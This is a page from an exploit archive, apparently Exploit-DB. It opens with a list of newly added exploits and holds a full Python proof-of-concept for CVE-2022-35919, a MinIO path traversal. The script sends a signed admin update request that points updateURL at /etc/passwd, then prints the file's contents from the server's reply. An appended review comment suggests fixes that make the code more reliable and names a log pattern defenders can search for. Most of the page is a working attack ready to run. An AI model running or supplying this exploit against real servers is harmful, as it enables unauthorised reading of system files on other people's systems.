
24 changes to exploits/shellcodes/ghdb Minio 2022-07-29T19-40-48Z - Path traversal Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service Atcom 2.7.x.x - Authenticated Command Injection Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE) Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction OpenPLC WebServer 3 - Denial of Service Splunk 9.0.5 - admin account take over BoidCMS v2.0.0 - authenticated file upload vulnerability Cacti 1.2.24 - Authenticated command injection when using SNMP options Chitor-CMS v1.1.2 - Pre-Auth SQL Injection Clcknshop 1.0.0 - SQL Injection Coppermine Gallery 1.6.25 - RCE Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) GLPI GZIP(Py3) 9.4.5 - RCE Limo Booking Software v1.0 - CORS Media Library Assistant Wordpress Plugin - RCE and LFI Online ID Generator 1.0 - Remote Code Execution (RCE) Shuttle-Booking-Software v1.0 - Multiple-SQLi Webedition CMS v2.9.8.8 - Blind SSRF WEBIGniter v28.7.23 File Upload - Remote Code Execution Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation Wordpress Sonaar Music Plugin 4.7 - Stored XSS Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
81 lines
No EOL
3.5 KiB
Python
Executable file
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
|
|
# Date: 2023-09-02
|
|
# Exploit Author: Jenson Zhao
|
|
# Vendor Homepage: https://min.io/
|
|
# Software Link: https://github.com/minio/minio/
|
|
# Version: Up to (excluding) 2022-07-29T19-40-48Z
|
|
# Tested on: Windows 10
|
|
# CVE : CVE-2022-35919
|
|
# Required before execution: pip install minio,requests
|
|
import urllib.parse
|
|
import requests, json, re, datetime, argparse
|
|
from minio.credentials import Credentials
|
|
from minio.signer import sign_v4_s3
|
|
|
|
|
|
class MyMinio():
|
|
secure = False
|
|
|
|
def __init__(self, base_url, access_key, secret_key):
|
|
self.credits = Credentials(
|
|
access_key=access_key,
|
|
secret_key=secret_key
|
|
)
|
|
if base_url.startswith('http://') and base_url.endswith('/'):
|
|
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
|
|
elif base_url.startswith('https://') and base_url.endswith('/'):
|
|
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
|
|
self.secure = True
|
|
else:
|
|
print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')
|
|
|
|
def poc(self):
|
|
datetimes = datetime.datetime.utcnow()
|
|
datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
|
|
urls = urllib.parse.urlparse(self.url)
|
|
headers = {
|
|
'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
|
|
'X-Amz-Date': datetime_str,
|
|
'Host': urls.netloc,
|
|
}
|
|
headers = sign_v4_s3(
|
|
method='POST',
|
|
url=urls,
|
|
region='',
|
|
headers=headers,
|
|
credentials=self.credits,
|
|
content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
|
|
date=datetimes,
|
|
)
|
|
if self.secure:
|
|
response = requests.post(url=self.url, headers=headers, verify=False)
|
|
else:
|
|
response = requests.post(url=self.url, headers=headers)
|
|
try:
|
|
message = json.loads(response.text)['Message']
|
|
pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
|
|
matches = re.findall(pattern, message)
|
|
if matches:
|
|
print('There is CVE-2022-35919 problem with the url!')
|
|
print('The contents of the /etc/passwd file are as follows:')
|
|
for match in matches:
|
|
print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
|
|
match[6]))
|
|
else:
|
|
print('There is no CVE-2022-35919 problem with the url!')
|
|
print('Here is the response message content:')
|
|
print(message)
|
|
except Exception as e:
|
|
print(
|
|
'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
|
|
print(response.text)
|
|
|
|
|
|
if __name__ == '__main__':
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
|
|
parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
|
|
parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
|
|
args = parser.parse_args()
|
|
minio = MyMinio(args.url, args.accesskey, args.secretkey)
|
|
minio.poc() |
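Review bot: In `MyMinio.__init__` the final `else` branch only prints the URL-format message and returns, so `self.url` is never set and the `minio.poc()` call at the bottom of the file fails with an `AttributeError` at `urllib.parse.urlparse(self.url)` instead of stopping cleanly; raise there instead, e.g. `raise SystemExit('Please enter a URL address that starts with "http://" or "https://" and ends with "/"')`. Both `requests.post` calls have no `timeout`, so an unresponsive host blocks the check indefinitely, and the HTTPS branch hard-codes `verify=False`, so the verdict is printed from a response whose origin was never validated; pass a `timeout=` value and make the certificate bypass an explicit opt-in argument. The `except Exception as e` block never uses `e` and reports every failure with the same message, so narrowing it to `except (ValueError, KeyError, TypeError):` would keep unrelated bugs visible. The header comment `pip install minio,requests` is not valid pip syntax and should read `pip install minio requests`. For operators checking their own deployment, what this file sends is a signed admin `POST` to `minio/admin/v3/update` whose `updateURL` is a local path rather than a URL, which is the pattern to look for in server access logs, and the header comment lists releases before 2022-07-29T19-40-48Z as affected.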